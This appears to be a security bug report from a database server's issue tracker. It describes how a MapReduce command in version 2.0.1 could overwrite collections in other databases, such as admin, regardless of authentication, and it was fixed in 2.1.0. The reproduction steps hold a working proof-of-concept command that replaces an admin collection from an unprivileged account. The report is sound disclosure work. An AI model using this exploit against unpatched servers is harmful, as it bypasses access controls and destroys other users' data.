Uploaded image for project: 'Core Server'
  1. Core Server
  2. SERVER-4471

[SECURITY] MapReduce able to overwrite any collection in any db regardless of authentication

XMLWordPrintableJSON

    • Type: Icon: Bug Bug
    • Resolution: Done
    • Priority: Icon: Major - P3 Major - P3
    • 2.1.0
    • Affects Version/s: 2.0.1
    • Component/s: MapReduce, Security
    • None
    • ALL

      use admin;
      db.addUser("admin", "strongpasswd");
      db.importantCollection.insert(importantData);

      use test;
      db.addUser("testUser", "passwd");

      restart mongo with authentication.

      Now, with the next snippet you can wipe the admin db's importantCollection:
      use test;
      db.auth("testUser", "passwd");
      db.test.insert(

      {foo: "bar"}

      );
      db.runCommand({
      mapreduce: "test",
      map : function Map() {
      emit(this._id, {});
      },
      reduce : function Reduce(key, values)

      { return values[0]; }

      ,
      out :

      { replace: "importantCollection", db: "admin" }

      ,
      });

      In short: you run a M/R on a collection that you have access, but the output is an other db's collection that you have no rights to read or write.

        1. StatMaker.js
          11 kB

            Assignee:
            antoine Antoine Girbal
            Reporter:
            benedicht György Nagy
            Votes:
            0 Vote for this issue
            Watchers:
            3 Start watching this issue

              Created:
              Updated:
              Resolved: